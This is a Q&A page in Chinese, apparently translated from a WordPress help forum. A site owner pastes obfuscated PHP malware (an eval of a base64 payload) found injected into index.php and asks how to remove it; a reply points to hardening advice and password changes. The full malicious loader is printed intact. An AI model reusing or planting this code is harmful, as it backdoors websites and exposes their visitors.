Index.php WordPress中的恶意代码

时间:2016-09-15 作者:Baba

我发现总是

<?php
header("Content-type: text/html; charset=utf-8");
@set_time_limit(0);
$xmlname = \'mapss.xml\';
$jdir = \'\';
$smuri = smrequest_uri();
if($smuri==\'\'){
    $smuri=\'/\';
}
$smuri = base64_encode($smuri);
$dt = 0;
function smrequest_uri(){
    if (isset($_SERVER[\'REQUEST_URI\'])){        
        $smuri = $_SERVER[\'REQUEST_URI\'];        
    }else{
        if(isset($_SERVER[\'argv\'])){       
            $smuri = $_SERVER[\'PHP_SELF\'] . \'?\' . $_SERVER[\'argv\'][0];     
        }else{      
            $smuri = $_SERVER[\'PHP_SELF\'] . \'?\' . $_SERVER[\'QUERY_STRING\'];        
        }
    }        
    return $smuri;        
} 


$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("JE8wTzAwMD0idGR5TlBMYUpGdm5XR2hxa1ZieHpDaU9FUXdnVFVCcFNlSGxzUm1ZREFYb01malp1SWNyS2RPcHdWcUp2Wm9QUmFRdEN1SU5YbkJHZ0xFaWttRFdZamVIRlNmYnNjbGhyQXhUeU16S1VWczlFSmVjaXNMaHduQlNoTXMwaXozU3BsM3ZIemFOUWIybWh2cDRQcW56UHFldzB6UHcwekJpQ3oyMTF6ZkNGdnA0UFVZQzdzTGhDSm5jOU1hdlF6Mm0yd1o5SElmd29UYW1odmFpV0dFMFV2ZVNISWxjaVZZRGN2WjllU3VTSXYzd2RPYXVkem5PT0dFMFV2YU9vTzJ1Qk1zMGl2MlFYVGxUSElQUzVxUjl5VGtyeVRSVGhJMjFIcVBTb3puejdzTGhDSlJMaVZZRGN2WjllU3VTSXYzd2RKUkxQbGtGaXNMaEN6MkgwVFljOU1nY0NsME9adVpGUHoyMVhKbFNIdjEwN3NMaEN6MkgwVFljOU1ldzB6SDlwVGxERmJSd0hVbnpvdnBFUHZwRUN6MkgwVFlDN3NMaENKYTlYT25jOU1uU0FtMHVZdUN1WVJwT011WlNMbDBRVm0xTFBsa0Z3bkJTeElhOXhKcGM5TW56UEdFMFVzTGhDT2F1ZHplT0hiQmM5TWdjQ2wwT1p1WkZQT2F1ZHplT0hiQk9PR0UwVXZlU0hJbEQzVFJNaVZZRFhPZXZBemZ1RUlhWnhUWWlQcXB6RnZwekZ2ZVNISWxEM1RSTVdHRTBVc0xXV1RCaUNPYXVkemVPSGJCSDdzTGh2dmV3V09hbWlWWWNDT2F1ZHplT0hiSEZFbFk0Q09hdWR6ZU9IYkhGTmxZNENPYXVkemVPSGJIRnBsa0Z3bmlDQ09hdWR6bmM5TWV3MWJQdzB6QmlDT2F1ZHplT0hiQkVYVWtGd25QMHduaTBVc0xXV1RCUVBUbFNISVBiaHYwUW11WkRBTDBOdlNtNW1sMEhMdnBDaXZCYml6M1NwYjJaWFRSd2R6blFQVGxTSElQYmh2MFFtdVpEQUwwTnZTbTVtbDBITHZwQ0ZNbk8xSWZkeUkzT3l2cENXTWVGd25CU3hJYTl4SnBjOU1hT0hPYXV5T0JpUFlaU21tWjlza2dIWmtIU0FZdWNQVWtGd25QMGlUUk5YVFJIZlVhT0hPYXV5T0JpUFlaU21tWjlibDBUVm1IT0RtQ1NaU1o5YWsxTVBVWWNmdkJEWE9ldnhibHdIYjIxRVVhT0hPYXV5T0JpUFlaU21tWjlibDBUVm1IT0RtQ1NaU1o5YWsxTVBVWUVpdjN1eUoyNW9PMjRQVVlDaWpFMFV2YXdGSTJ3S01zMGlUMnUwVFI1MlVuT011WlNMbDFRQVNDOVl1MFpZU2d1Z2wwVFZtQnpXR0UwVUFZREhJZXdISlJiaFQydTBUUjUyVW5PWVNtMVZ1Z3VBTG1TZ21CeldNbmJmTWV3MHpmd1F6MnV4SWxjaFQydTBUUjUyVW5PWVNtMVZ1Z3VBTG1TZ21CeldxbmNQT1I1S0lmOTNJQnpXVVlEN3NMaENiMk5vYjJGaVZZRFBUbFNISVBiaHYxdlprbTltU3U5RFNnU1l2cEM3c0xXOU1hdUZ6MnVXVEJRV3ozd0hPbmlDbDF3Wm1IVFptSEZQbUN1d2sxU1psMFpnU1pNUGxZQ2l2QmJpdlo5a1N1dlJTdXZJdjF2WmttOW1TdTlEU2dTWXYxMGl2QmJpejNTcGIyWlhUUndkem5pQ2wxd1ptSFRabUhGUG1DdXdrMVNabDBaZ1NaTVBsWUVpdjN1eUoyNW9PMjRQVVlDaWpFMFV2YXdGSTJ3S01zMGl2WjlrU3V2UlN1dkl2MXZaa205bVN1OURTZ1NZdjEwN3NMVzlzTFdXVEJRWE9ldld6M1NwVW5TeElhOXhKcEVQcW56V1VsRnduaUNDYjJOb2IyZEFPYTFFTXMwaVRsUUVJYTlDVFlpQnFuTUZ2YXdGSTJ3S1VrRnduaUNDYjJOb2IyRmlWWWNDYjJOb2IyZEFPYTFFUlhET0dFMFVBTEN3bmZIZlVnY0NsME9adVpGUEoyaFBsWWM5VlljQnJZTVdqRUN3bmlDQ09sdXBJbmM5TW5TQVMwdW1ScE9LSlB3V09hbVBsa0Z3bmlDd25pSEhiMlFvTW56OEpSVHBiUjFITW5EV1RzMEJJUlpXSVBPSGJCTWlJZlpkVGswQklSWldJUE9IYkJNaUphdVdUMlEwVllNTnJzY0hNQkQzSlJTMEpzMEJya2NFdllNaXozUzVJYW05TUJEQ0psd0VJYVo1R0JEQklhOXhKWGRGVFJUMEd4YzdPYTlFR3hjN3phOVhKbFNXSTI0NlRmSDRUUkw3TWVoZEpSNUNUbGk2TXNnRXJzY0Vyc0ZpTWF2UWIyZFB6ZjkxSWZMZGIyOUZJM002TW53ZlRmYjdNQkRmemZaZFRSdm96ZlNIekJjOU1uTUVNQmNpVFB2UUlSdUJJM3ZDVGxNOU14Y0JNbkRvSUNOb2JSTDlNZkhhemZaZFRtUUhKUk9oT25pV01CRFh6ZnI5TUJ6eWJmWlhUa2IwbDJTSGIyOUNUWWlDT2x1cEluQ3l2cE0rVm45V1RQdlFJUm0rdlhGd25pSEhqYUgwR0UwVUFMQ2lzTFdXVEJpQ3oySDBUWUg3TWMwVW5SSGZVblNYSmxTSE1zMDlNbk80SVJFUFVsRnduaUN2dmVPSGJCYzlNbk9oT2VTRUdCOG92cDRDVDI5M1RSTXl2cDlYSmxTSElSWkVxUERoenM5Q2JsU0hWWXp5dmFIQ3FCemZPYXVkenMwUHFCUzBUUjFFcUJ6Zk8ydUJWWXp5dmFRb3ozTHl2cFQ0SVJFOXZwNENUZUx5dnBUaFZZenl2YWk3TWMwVW5MSFdUQlFYT1J2WE9lTWh2ZVNISWxjRnJuRTRVazA5djN3aFRSTkZqYTFGdnBIN3NMaHZuTENDamExRklmWmRUWWM5TWV3MWJQdzB6QmlDT2F1ZHpuRTRVWTRQcVBRZEluejdzTGh2bmwwd25pQ3ZKUmJoejN1QnozU3BVblMwVFIxRXFzY0Z3cEM5VllPaGJSd0tqYTFGdnBIN3NMaHZuTEhXVEJRWE9SdlhPZU1odmVTSElsY0Z3cENXakUwVW5MQ3ZuWVM0SVJOeWJSMUhNczBpejN1QnozU3BVblMwVFIxRXFzeldxQnp5amExRnZYRnduaUN2bmwwdm5MQ3duaUN2QUwwVW5MQ0NqYTFGTXMwaU9ldldJWVFYSVI5MU9hU29VblMzVFJNV1VrRmlzTGh2bllTZGpSVFdJYW1pVllEZkkzREhJQmlDamExRklmWmRUWUVpTVB6QlVrRmlzTGh2blJUM3pmSDBUWWlDSWxIZkpSTkhxbmNDamExRlVrRnduaUN2VGZ3Rkkzd0hVblNkalJUV0lhbVdHcGN3bmlDdlRSd2hJcGNCSTJGOGJQTStKZVMwenNob3FwTXl2WjlrU3V2UlN1dkl2MFFtdVpEQVlnOWt1bk9PcUJNb01CNENqYTFGSWZaZFRrRmlzTGh2blJ1eEphOGlNeE5Ceng0QnFCUzNUUk03c0xodm5MMFVuTEhIamFIMFVuQzdzTGh2QUxDd25pSFdUQmlDSlJMV2pFMFVuTENDTzJ1Qk1zMGl2MlEwT2VjNnFwOFBxQlNQSTNPSGJCNFBxMkh5VGF1NHFQRGh6czkxemZFOXZwNEN6MkgwVFk0UHZmSENWWXp5dmFIQ3FCemZPYXVkenMwUHFCUzBUUjFFcUJ6ZlRlTDl2cDRDVGVMeXZwVGhWWXp5dmFpeXZwVDNUUk05dnA0Q0phOVhPbjRQdlBXNlZZenl6MjFXejJ2b09uaVdxQnpmSmZTV3p4MFBxQlN0VGFIcHFCemZiMk5vYjJGOXZwNENiMk5vYjJGN3NMaHZuUnV4SmE4aU9ldldJWVFYSVI5MU9hU29VblMzVFJNV1VrRmlzTGh2blJ1NEpsTGhVa0Z3bmlIOXNMVzlUUk5YVGxGd25pQ0NPMnVCTXMwaXYyUTBPZWM2cXA4UHFCU1BJM09IYkI0UHEySHlUYXU0cVBEaHpzOTF6ZkU5YmY5MHZmSENWWXp5dmFIQ3FCemZPYXVkenMwUHFCUzBUUjFFcUJ6ZlRlTDl2cDRDVGVMeXZwVGhWWXp5dmFpeXZwVDNUUk05dnA0Q0phOVhPbjRQdlBXNlZZenl6MjFXejJ2b09uaVdxQnpmSmZTV3p4MFBxQlN0VGFIcHFpQ1B2ZndGSTJ3S1ZZenl2YXdGSTJ3S3FCemZPbHZXVll6eXZld2RPbHZXR0UwVW5SSGZVblpYT2V2WE9lTWh6MjFvT2xTQ0lwaUNPMnVCVVlFUElmOUJJM1MxejJ1cGJST0hJUExQVVlIN3NMaHZuUnV4SmE4aU9ldldJWVFYSVI5MU9hU29VblMzVFJNV1VrRnZuTDBVbkxISGphSDBVbkM3bkxDd25pSDlzTFc5c0xod25mVDFJZncwSlI5eU1ld2RKbHdCSTNMaFVZRDdzTGh2dmFaUFRSNTBNczBpejNTcE9hOUZJM09IekJpQ2wxd1ptSFRabUhGUFlaU21tWjl1bTB1WWwwWmVTbTVtdjEwV0dFMFVuUkhmTW5pQ2JST0hJUExpTWswaU1CTVdNZUZ3bmlDdnZld0VKUlNIekh3V09hbWlWWURRelB2UWpZY2hNSFNISWZ3SElQU216ZloyVFJOSHpCTUZNQ09vSTJPRlRSdm9Pbk1GTWYxWElmdm9Pbk1GTUh3b3oyOVh6YUhDVGxNS01CRUJtMjlQSTNtaU8ydUJNZXdFSlJTSHpCTUZNZkhRbDJacGIyUVdPZnVwTUJFQlJSWmhJMjhRTVp3Rk9sdkVNQkVCUlI5MVRhWm9MZjkwTUJFQlJSWmhJMjhpbTJOMXpQY0JxbnZ3bTA1bkkzTEJxbnZVYmxUUU1uUVZUUFNISUJEWHphWmRNYXZvT25DQnFudm5iUkhnT3V3RUpSU0h6Qk1GTUhUb0pSTlFNQkVCUlJaeVRhdTRNYXZvT25NRk1Ddmt6YUhDVGxNQnFudjBPMkh4VFJOSHpCTUZNSHdvVDI5MU1ad0VKUlNIekJNRk1Id0VUUnVDallEa3phSENUbE1CcW52ZUkyOVBJYW1pTFJTa1RSNVhUWU1GTUNRSHpmSDB6Zkg0TUJFQm1lSDBKYTl5cWx1cElhTldiQk1GTUNaRlRsUVFNblF2TFlERHpmd2hKbFRIekJDQnFudkR6MkZCcW52WmphWkJJM0xCcW52c09sdzBJcE1GTUM5MU9hVG9qZ3ZvT245VEkyU1FJMHZvT25NRk1QSFFiM0NCcW52a09sdjJUbEhuSTNMQnFudkZUUk9YTUJFQkllT0VxbFNwSmxUV2JSRUJxbnZHT2xTeEpuTUZNSHcwYlJ3S21mWmRiZk5IekJNRk1IU2hUWUQzVFJNaWJsdnhKYUgyVFljaFltZ2lMbHZ4SmFIMlRsTVdNQkVCbWF1cEluRDBJMjlGTUJFQmttaE5yZnZvT25NRk1DNUhPYXdwYlJUME1CRUJrdXd2U213cGJsT0ZUbE1CcW52bFMydTBNZVNvSTJOWE1CRUJJYVpwYmZIeU1CRUJTZkhYSm5EWFRSWnBiMmlCcW5jUGJmSHlUMnZvT256RnYyT29JMk9GVFl6Rk1uT0JiUkhDT1l6Rk1uT1FJMkVQcW5jUGJmSHlUcHpGTW5PNWJSUW9JcHpXR0UwVW5MSGZJM3ZIYlJ3aE1uaUN6M0RXVGF1cG0ySDBUWURRenBjQ09mWkZVWUQ3c0xodm5MQ0N6M1NwTXMwaXozU3BPYTlGSTNPSHpCaUNPZlpGVWtGd25pQ3ZuUkhmTW5RWE9ldkVJM3JodmFaUFRSNTBxbmNDejNTcFVZQ2lqRTBVbkxDdm5sdkhPZXVwSUJEMHpQdUhHRTBVbkxDdkFMMFVuTEg5c0xodkFSdUZ6MnU3c0xodm5sdkhPZXVwSUJEZmJSTlhUa0Z3bmlIOXNMVzlzTFdmT1I1eE9hSG9JQkRYSVI5MU9hU29VblMxemZFV2pFMFVuWVNmSlJOSGwyd29JUFNISVBTWE1zMGlMYVRXSWF1QVQydTBsMndvSVBTSElQU1hVblMxemZFV0dwY3duaUhXVEJjaE1ZU2ZKUk5IbDJ3b0lQU0hJUFNYVVlEN3NMaHZuWVN4Sm5jOU1hdzF6Zk5BSlI1V09uaVdHRTBVbkxIeE9sdkZsM3dIT2E5RU9uaUNiMmlGTWd3dW1DTlZtWlNBdXV2cnFuY0NPbHZGVWtGd25pQ3ZiM3VwSVo5WFRsU296ZUxodmF3aHFuRHN1dXZyazFEbWwxdlp1WnVZa0hTWUxtNWtTQ3VZcXNnV0dFMFVuTENDVGZIRlR1OXhJMjUwVFI1MHpwYzlNYXcxemZOQVRsUUhicGlDYjJpV0dFMFVuTEh4T2x2Rmwyd0ZJM3dIVW5TeEpuQzdzTGh2QVljd25pSHBUbFMxemY0aXZhVFdJYXVBYjI5eU9hdXlPZXI3c0xXOXNMaC9WaT09IjtldmFsKCc/PicuJE8wME8wTygkTzBPTzAwKCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwKjIpLCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwLCRPTzAwMDApLCRPTzBPMDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw=="));
 ?>
in my index.php file any solution to remove permanently

1 个回复
SO网友:sdexp

这是一篇关于WordPress安全性的好文章,有很多好建议。。。https://codex.wordpress.org/Hardening_WordPress.

我会遵循上面文章中的建议,确保更改FTP、博客登录等的所有密码,使它们都是唯一的、长的和随机的。

标签: hacked   小码农  

相关推荐

How was my WP site hacked

我的网站,http://www.cancer-study.com, 已被黑客攻击,我无法登录到wp管理员。你能说一下它是如何被黑客入侵的吗?我能做些什么来修复损坏?我可以访问主机。